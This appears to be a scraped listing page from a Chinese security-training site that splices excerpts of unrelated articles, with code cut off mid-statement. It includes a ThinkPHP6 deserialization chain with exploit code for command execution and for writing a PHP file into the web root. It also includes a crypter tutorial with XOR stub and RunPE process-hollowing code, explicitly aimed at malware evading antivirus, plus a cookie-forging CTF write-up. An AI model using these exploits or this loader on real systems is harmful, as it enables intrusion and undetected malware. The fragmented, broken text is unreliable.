# 下一个响应的帧号 Content-encoded entity body (gzip): 570 bytes -> 866 bytes #内容编码（gzip ） Line-based text data: text/html # 文本内容以上就是POST 方法的 HTTP 响应包，可以看到服务器向客户端发送了 HTTP/1.1 200 OK响应了HTTP 请求包。服务器类型为HFS 2.3 beta，将数据填入到报文格式中 POST方法的HTTP响应报文格式 HTTP/1.1 空格 200 空格 OK \r \n Server : HFS 2.3 beta \r \n … Content-Encoding : gzip \r \n \r \n 省略实验中我们讲解了主要的GET和POST 方法，可以抓包考虑，学习其他的方法，动手提高能力。本文涉及相关实验：https://www.yijinglab.com/expc.do?ec=ECID172.19.104.182015121711544400001 这个技术你学会了吗？加入网安实验室，1300+网安技能任你学！

浅谈md5弱类型比较和强碰撞

thinkphp6的另反序列化分析

你是否正在收集各类网安网安知识学习，蚁景网安实验室为你总结了1300+网安技能任你学，https://www.yijinglab.com/loginLab.do#stu>> Forward 之前分析过tp6的一个链；当时是利用__toString方法去进行的中转，从而实现前后两个链的链接，这次是两个另外链条；利用的是可控类下的固定方法进行中转；开始分析；首先环境可以composer一键搭建，然后php think run进行跑起来就可；本文涉及知识点实操练习：https://www.yijinglab.com/expc.do?ec=ECIDb06f-9bfa-4e0a-80af-36af7391a643（通过该实验了解ThinkPHP5远程命令执行漏洞的原因和利用方法，以及如何修复该漏洞。） text 首先的想法就是利用析构函数进行最开始的触发；然后一路追踪魔法函数去进行一步一步的推导；首先找到魔法函数在AbstractCache类下； protected $autosave = true; public function __destruct(){ if (! $this->autosave) { $this->save(); }} 其代码如上；可以看到autosave可以可控；这里我们可以手动给其复制为false；从而可以触发save方法；回溯save方法；在CacheStore中找到了save方法；具体代码如下； public function save(){ $contents = $this->getForStorage(); $this->store->set($this->key, $contents, $this->expire);} 可以看到其调用了getForStorage方法，然后将其赋值给$contents变量。这里追随一下这个方法； public function getForStorage() { $cleaned = $this->cleanContents($this->cache); return json_encode([$cleaned, $this->complete]);} 发现首先调用了cleanContents方法；然后在调用了json_encode方法，这里首先回溯一下cleanContents方法； public function cleanContents(array $contents) { $cachedProperties = array_flip([ 'path', 'dirname', 'basename', 'extension', 'filename', 'size', 'mimetype', 'visibility', 'timestamp', 'type', 'md5', ]); foreach ($contents as $path => $object) { 首先在这里看到了array_flip方法；这个方法是将数组的键名和键值进行替换；然后数组赋值给$cachedProperties变量；然后将我们传入的参数按照$path和$object的格式来进行各个遍历；然后将键名经过is_array方法的判断如果为true则进行后续的函数处理；否则就直接return $content这个数组；经过这一系列操作完之后，最终是return到了save函数里；然后接着去进行 $this->store->set($this->key, $contents, $this->expire);这里我们发现store也可控；那么就有两种思路，第一个就是去实例化一个有set public function set($name, $value, $expire = null): bool{ $this->writeTimes++; if (is_null($expire)) { $expire = $this->options['expire']; } $expire = $this->getExpireTime($expire); $filename = $this->getCacheKey($name); $dir = dirname($filename); if (!is_dir($dir)) { 这里可利用点在后面的serialize方法；直接追溯一下； protected function serialize($data): string{ if (is_numeric($data)) { return (string) $data; } $serialize = $this->options['serialize'][0] ?? "serialize"; return $serialize($data);} 这里发现options参量可控；这里就存在一个问题，如果我们将其赋值为system，那么后续return的就是我们命令执行函数，里面的data我们是可以传入的，那么我们就可以实现RCE；这里放出我自己写的exp； <?php#bash回显；网页不回显；namespace League\Flysystem\Cached\Storage{abstract class AbstractCache{ protected $autosave = false; protected $complete = []; protected $cache = ['`id`']; }}namespace think\filesystem{use League\Flysystem\Cached\Storage\AbstractCache;class CacheStore extends AbstractCa 最后达到的效果就是system(xxxx);这里当时我测试没有回显，后来将代码调试了一下，发现是system里面参数的问题，后来我想到linux或者unix下反引号也是可以当做命令执行的，而且是可以首先执行的；所以我将代码改了下，嵌入反引号，这样可以更好的进行命令执行，但是这样的缺点就是可以执行，但是无回显；但是我们依然可以进行一些恶意操作；通过这个链，相信可以发现一些端倪，除了可以rce以外，这个链在最后的利用地方还有一个file_put_contents这个也是可以利用的; 下面利用的一些骚姿势如果有师傅不太理解，可以看这个链接；https://s1mple-top.github.io/2020/11/18/file-put-content%E5%92%8C%E6%AD%BB%E4%BA%A1%C2%B7%E6%9D%82%E7%B3%85%E4%BB%A3%E7%A0%81%E4%B9%8B%E7%BC%98/ 下面也讲述一下；利用链和之前的是一样的；就是最后需要掌控一下filename和data的内容；我们可以看到如下图；在最后的时候会有一个data的拼接，我本来想着在格式化那里尝试引入，但是格式化已经写死了，不能利用非法字符进行污染格式化引入危险代码；所以只能在最后的data处进行写入拼接；现在就是要控制data了；其实这里data是调用了serialize方法，追溯一下不难发现是将数组option中的serialize的键值拿出来套在了data前面；其实本质上也无大碍；但是这里有个小坑；因为是$serialize($data);所以这里要求这样的搭配必须是正确的，如果你随意传入函数，造成比如adsf($data);这样类型的不规则函数，就会导致报错，从而无法进行；明白了这一点其实还有一个小坑；其实option的内容我们是可控的；那么我们就可以控制serialize的键值进行传入；但是这里因为之前进行了json_encode所以一般的函数最后构成的格式都无法进行base64解密；但是这里有个例外，我测试了serialize函数，发现经过序列化之后，我们可以正常进行base64解密；大概是因为可以构成字符串的原因吧；这里放出我的exp； <?phpnamespace League\Flysystem\Cached\Storage{abstract class AbstractCache{ protected $autosave = false; protected $complete = []; protected $cache = ['PD9waHAgcGhwaW5mbygpOz8+']; }}namespace think\filesystem{use League\Flysystem\Cached\Storage\AbstractCache;class CacheStore extends Abst 另外可能有很多师傅困惑在可写目录的问题，这里我才用了虚目录的方法将其定位到了public目录之下；就在path参数那里可以体现；最后访问结果是执行phpinfo;当然也可以写入system这样的命令执行函数；造成木马利用；这个技术你学会了吗？加入https://www.yijinglab.com/mobile/actReg.html?pk_campaign=wenzhang-wemedia，1300+网安技能任你学！

这都学不好Web安全你真的太让我失望了

两种CTF中特殊盲注的总结

各位有所不知，前几天我举办了一次CTF竞赛...

2021年，我们热血开局！ 1月的最后一周，我们再次见证了成长与历练。时间：2021/1/26-1/28 事件：蚁景杯 WUST CTF2021新生赛蚁景杯 WUST CTF2021新生赛：武汉科技大学俱乐部2021首场CTF竞赛，WEB、PWN、 MISC、CRYPTO、REVERSE五大题型迎接新生来战！比赛为期三天，一方面考验着参赛队员的耐力值；题目类型涵盖面较广，在考验新生“学习情况”方面下足了“猛料”。武汉科技大学俱乐部，因为热爱聚集到一块，学习从0到1的过程，响应号召，依然极客前行！

神秘的加密工具

我一直认为，在黑客世界里，加密技术是一种很神秘的艺术，是一种很隐晦的东西，我们可以查找资料来进行研究。当然，它在黑客世界中已经变得非常普遍，尤其是在2013年和2014年推出了Veil-Evasion和shellter工具。在这篇文章中，我将详细介绍加密工具的类型以及它们在底层的工作原理，然后展示低级代码层面上一些鲜为人知的技术。在阅读完这篇文章后，我希望大家最终能对这些玩意儿的工作原理以及它们在计算机世界中的地位和作用有一定程度的了解。本文涉及知识点实操练习：https://www.yijinglab.com/expc.do?ec=14804a13-fea8-4bcf-a928-a71a40e7cfa4 （通过本实验，了解RC4加密技术）稍微声明一下：有些材料可能不适合初学者，因为它们需要相当多的Windows底层的知识。包括以下很多技术。掌握 C/C++ 熟悉WinAPI 和对应的文档熟悉基础的加密知识熟悉PE文件的结构熟悉 Windows 虚拟内存熟悉进程和线程密码学的两个方面当我们谈起对于密码学的印象时，我们经常会想到 "这是一种处理信息的手段，防止信息被泄露出去"。我们大多数人都把它看成是一种防御机制，其应用的目的在于确保信息的安全，阻止恶意的攻击。当然，我们很清楚这一点，因为它被发明出来的唯一目的就是保护数据，然而，正如我们很快就会看到的那样，密码学的功能已经远远不止这些。如果我们使用传统的密码学来进行恶意攻击，即设计恶意软件，利用密码学提供的优势。这些类型的恶意软件在现代已经非常普遍，包括勒索软件和非对称后门等，它们主要涉及公钥密码学。反病毒机制为了能够设计出绕过杀毒软件的方式，我们必须首先要明白杀毒软件的杀毒方式。我将简单介绍一下杀毒软件检测应用程序采用的两种主要方法。基于签名的检测顾名思义，基于签名的检测是一种将应用程序的签名与相应的已知恶意软件的数据库进行交叉参考匹配的技术。这是预防和遏制之前出现过的恶意软件的有效措施。基于启发式检测虽然基于签名的检测可以防止大多数以前已知的恶意软件，但它也有缺点，因为恶意软件作者可以针对这种方法添加保护措施，如使用多态和变形代码等。基于启发式的检测会监控应用程序的行为和特征，并将其与已知的恶意行为进行匹配。请注意，只有在应用程序正在运行的情况下才会进行这种检测。当然，杀毒软件要比这个高级很多。由于这已经超出了文章讨论的范围，也超出了我的理解范围，所以这里不会涉及这些信息。加密技术简介加密器是被设计用来保护文件内部信息的软件，并且在执行后，用解密程序提取后能够完整地提供信息。请注意，虽然加密器可以被用于恶意目的，但它也主要用于混淆数据，防止对软件逆向工程。在本文中，我们将重点讨论恶意使用的情况。那么，这是如何工作的呢？让我们先来了解密码器的各部分，看一下它们的作用。加密器负责对目标对象进行加密。 +-------------+ +-----------+ +-------------------+ +--------+ | Your file | -> | Crypter | => | Encrypted file | + | Stub | +-------------+ +-----------+ +-------------------+ +--------+ +------------------+ +--------+ +---------------+ | Encrypted file | + | Stub | = Execution => | Original File 扫描时加密器这些类型的加密器由于能够加密磁盘上的数据而被称为扫描时加密器，杀毒软件可以对文件进行扫描，例如基于签名的检测。在这一阶段，只要应用的混淆技术是足够强大的，杀毒软件将永远无法检测到任何恶意活动。运行时加密器这些加密器将加密技术提升到了一个新的水平，能够在内存中运行时根据需要对数据进行加密。通过这样做，能够使恶意软件在杀毒软件作出反应之前加载和执行。在这个阶段，一个应用程序可以快速地运行它的有效载荷并达到它的目标。但是恶意软件完全有可能在执行阶段触发杀毒软件的基于启发式的检测策略，所以恶意软件作者应该小心。现在我们已经介绍了高层次的内容，那么我们就来看看这两种类型的实例。编写扫描时间加密器扫描时加密器是两者中比较简单的，因为它不需要虚拟内存和进程/线程的知识。本质上，stub会对文件进行处理，把它放到磁盘上的某个地方，然后执行它。下面记录了一个扫描时加密器的设计。注意：为了简洁和可读性，内容将不包含错误检查。加密器和stub伪代码 1.检查是否有命令行参数 +-> 2. 如果有命令行参数，则作为加密器对文件进行加密处理 | 3. 打开目标文件 | 4. 读取文件内容 | 5. 对文件内容进行加密 | 6. 创建一个新文件 | 7. 将加密后的文件写入新文件 | 8. 結束 | +-> 2. 如果没有命令行参数，则作为stub 3. 打开加密文件 4. 读取文件内容 5. 解密文件内容 6. 创建一个临时文件 7. 将解密后的内容写入临时文件 8. 执行文件 9. 完成这个设计方案在同一个可执行文件中同时实现了加密器和stub，我们可以这样做，是因为这两个操作非常相似。下面用代码来介绍一下设计方案。首先，我们需要定义main和两个条件，这两个条件定义了是执行加密器还是stub。 int APIENTRY WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) { if (__argc < 2) { // stub routine } else { // crypter routine } return EXIT_SUCCESS; } 由于我们将应用程序设计成了窗口应用程序，我们不能像通常基于控制台的应用程序中那样检索 argc 和 argv，但是微软提供了使用 argc 和 argv的解决方案。如果命令行参数 __argv[1] 存在，应用程序将尝试对指定的文件进行加密，否则，它将尝试解密一个被加密的文件。接下来是加密程序，我们需要 __argv[1] 来指定文件的句柄和它的大小，这样我们就可以把它的字节复制到一个缓冲区中进行加密。 int APIENTRY WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) { if (__argc < 2) { // stub routine } else { // crypter routine // open file to crypt HANDLE hFile = CreateFile(__argv[1], FILE_READ_ACCESS, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL); // get Crypt函数主要是将文件内容读入到一个缓冲区中，然后对其进行加密，然后返回一个指向缓冲区的指针。 LPVOID Crypt(HANDLE hFile, DWORD dwFileSize) { // allocate buffer for file contents LPVOID lpFileBytes = malloc(dwFileSize); // read the file into the buffer ReadFile(hFile, lpFileBytes, dwFileSize, NULL, NULL); // apply XOR encryption int i; for (i = 0; i < dwFileSize; i++) { *((LPBYTE)lpFileBytes 现在我们有了加密的字节，我们需要创建一个新的文件，然后将这些字节写入其中。 int APIENTRY WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) { if (__argc < 2) { // stub routine } else { // crypter routine ... // get crypted file name in current directory CHAR szCryptedFileName[MAX_PATH]; GetCurrentDirectory(MAX_PATH, szCryptedFileName); strc 加密器部分差不多就是这些了。注意，我们使用了一个简单的XOR来加密文件的内容，如果我们能够获得密钥，这种方案的安全性可能是不够的。如果我们想更加安全，我们可以使用其他的加密方案，如RC4或(x)TEA。我们不需要完整的加密算法，因为我们的目的是为了避免基于签名的检测，因此这么做完全是矫枉过正。保持文件小而简单最重要。让我们继续进入stub例程。对于stub程序，我们要检索当前目录下的加密文件，然后将解密后的内容写入一个临时文件中进行执行。我们首先要得到当前的要处理的文件，然后打开文件，得到文件大小。 int APIENTRY WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) { if (__argc < 2) { // stub routine // get target encrypted file CHAR szEncryptedFileName[MAX_PATH]; GetCurrentDirectory(MAX_PATH, szEncryptedFileName); strcat(szEncryptedFileName, "\\"); strcat(szEncr 和加密器例程差不多。接下来，我们要读取文件内容，并得到解密后的字节。由于XOR操作恢复了给定的公共位的值，我们可以简单地重用Crypt函数。之后，我们需要创建一个临时文件，并将解密后的字节写入其中。 int APIENTRY WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) { if (__argc < 2) { // stub routine ... // decrypt and obtain decrypted bytes LPVOID lpFileBytes = Crypt(hFile, dwFileSize); CloseHandle(hFile); // get file in temporary directory CHAR szTempFileName[MA 最后，我们需要执行解密后的应用程序。 int APIENTRY WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) { if (__argc < 2) { // stub routine ... // execute file ShellExecute(NULL, NULL, szTempFileName, NULL, NULL, 0); } else { // crypter routine } return EXIT_SUCCESS; } 请注意，一旦解密后的应用程序被写入磁盘，它很有可能被杀毒软件的基于签名的检测方式检测出来，因此这样有可能捕获大多数的恶意软件。正因为如此，恶意软件的作者需要编写即使他们的应用程序在这种情况下仍然能够执行的功能。扫描时加密器就到此为止。编写一个运行时加密器对于运行时加密器，我的文章只涉及stub，因为它还包括更复杂的过程，所以我们将假设应用程序已经被加密。这些加密器使用一种叫做RunPE的流行技术。它的工作原理是stub先解密应用程序的加密字节，然后模拟Windows加载器，将它们推送到暂停进程的虚拟内存空间中。这个过程完成后，stub将把暂停的进程恢复运行。注意：为了简洁和可读性，我将不包含错误检查。 stub伪代码 1. Decrypt application 2. Create suspended process 3. Preserve process's thread context 4. Hollow out process's virtual memory space 5. Allocate virtual memory 6. Write application's header and sections into allocated memory 7. Set modified thread context 8. Resume process 9. Finish 我们可以看到，这需要相当多的Windows内部知识，包括PE文件结构、Windows内存操作和进程/线程的知识。我强烈建议读者在理解这些知识的基础上来理解下面的材料。首先，让我们在main中设置两个例程，一个用于解密被加密的应用程序，另一个用于将其加载到内存中执行。 APIENTRY WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) { Decrypt(); RunPE(); return EXIT_SUCCESS; } Decrypt函数实现方式完全依赖于用于应用程序的加密方式，这里是一个使用XOR的示例代码。 VOID Decrypt(VOID) { int i; for (i = 0; i < sizeof(Shellcode); i++) { Shellcode[i] ^= Key[i % sizeof(Key)]; } } 现在，应用程序已经被解密，让我们来看看神奇的地方。在这里，我们通过检查DOS和PE签名来验证该应用程序是否是一个有效的PE文件。 VOID RunPE(VOID) { // check valid DOS signature PIMAGE_DOS_HEADER pidh = (PIMAGE_DOS_HEADER)Shellcode; if (pidh->e_magic != IMAGE_DOS_SIGNATURE) return; // check valid PE signature PIMAGE_NT_HEADERS pinh = (PIMAGE_NT_HEADERS)((DWORD)Shellcode + pidh->e_lfanew); if (pinh->Signature != IMAGE_NT_SIGNAT 现在，我们将创建暂停的进程。 VOID RunPE(VOID) { ... // get own full file name CHAR szFileName[MAX_PATH]; GetModuleFileName(NULL, szFileName, MAX_PATH); // initialize startup and process information STARTUPINFO si; PROCESS_INFORMATION pi; ZeroMemory(&si, sizeof(si)); ZeroMemory(&pi, sizeof(pi)); // required to set size of si.cb 注意，szFileName可以是任何可执行文件的完整路径，如explorer.exe或iexplore.exe，但在本例中，我们将使用stub的文件。CreateProcess函数将在暂停状态下创建一个指定文件的子进程，这样我们就可以根据自己的需要来修改它的虚拟内存内容。 VOID RunPE(VOID) { ... // obtain thread context CONTEXT ctx; ctx.ContextFlags = CONTEXT_FULL; GetThreadContext(pi.Thread, &ctx); } 现在我们清空进程的虚拟内存区域，这样我们就可以为应用程序分配自己的运行空间。为此，我们需要一个函数，而这个函数对我们来说并不是现成的，因此我们需要一个函数指针，指向一个从ntdll.dll 文件中动态检索内容的函数。 typedef NTSTATUS (*fZwUnmapViewOfSection)(HANDLE, PVOID); VOID RunPE(VOID) { ... // dynamically retrieve ZwUnmapViewOfSection function from ntdll.dll fZwUnmapViewOfSection pZwUnmapViewOfSection = (fZwUnmapViewOfSection)GetProcAddress(GetModuleHandle("ntdll.dll"), "ZwUnmapViewOfSection"); // hollow p 由于被暂停的进程在其虚拟内存空间内有自己的内容，我们需要从内存中对它进行解映射，然后分配我们自己的内容，这样我们就有访问权限来加载我们的应用程序的映像。我们将通过WriteProcessMemory函数来实现。首先，我们需要像Windows加载器一样，先写头文件，然后分别写每个部分。这一部分需要对PE文件结构有一个全面的了解。 VOID RunPE(VOID) { ... // write header WriteProcessMemory(pi.hProcess, (LPVOID)pinh->OptionalHeader.ImageBase, Shellcode, pinh->OptionalHeader.SizeOfHeaders, NULL); // write each section int i; for (i = 0; i < pinh->FileHeader.NumberOfSections; i++) { // calculate and get ith section PIMAGE_SECTION 现在一切就绪，我们只需修改上下文的切入点地址，然后恢复暂停的线程。 VOID RunPE(VOID) { ... // set appropriate address of entry point ctx.Eax = pinh->OptionalHeader.ImageBase + pinh->OptionalHeader.AddressOfEntryPoint; SetThreadContext(pi.hThread, &ctx); // resume and execute our application ResumeThread(pi.hThread); } 现在，应用程序已经开始在内存中运行，希望杀毒软件不会检测到它。

进入网站后台找flag

这次的题目是进入网站后台找flag，题目地址：https://www.yijinglab.com/expc.do?w=exp_ass&ec=ECID9d6c0ca797abec2016092313250000001& 首先打开题目网页，内容如下：简单的字母提示和一个明显的按钮。点击按钮，左上角页面出现提示：Only Member with Admin rights is allow to enter。意思是只能以管理员身份进入网站后台。用brupsuit抓包，看看数据包的发送情况：返回的数据包中设置了cookie的值，Member的值经过了base64加密。在burpsuite的decoder模块解码——>输入Tm9ybWFs——>Decode as ——>Base64：然后根据页面的提示，把Admin进行base64加密，得到得到QWRtaW4=，构造这样一个请求包，发送。然后再Intercept中将Member的值换成上面加密的值，并点击Forward发送。出现flag 实验总结：主要用到bursuite抓包分析数据，还有base64的加密和解密。 Base64密文有如下特点： - 字符串只可能包含A-Z，a-z，0-9，+，/，=字符 - 字符串长度是4的倍数 - =只会出现在字符串最后，可能没有或者一个等号或者两个等号

第2页第3页第4页第5页第6页第7页第8页第9页第10页第11页第12页第13页第14页第15页第16页第17页第18页第19页第20页第21页第22页第23页第24页第25页第26页第27页第28页第29页第30页第31页第32页第33页第34页第35页第36页第37页第38页第39页第40页第41页第42页第43页第44页第45页第46页第47页第48页第49页第50页第51页第52页第53页第54页第55页第56页第57页第58页第59页第60页第61页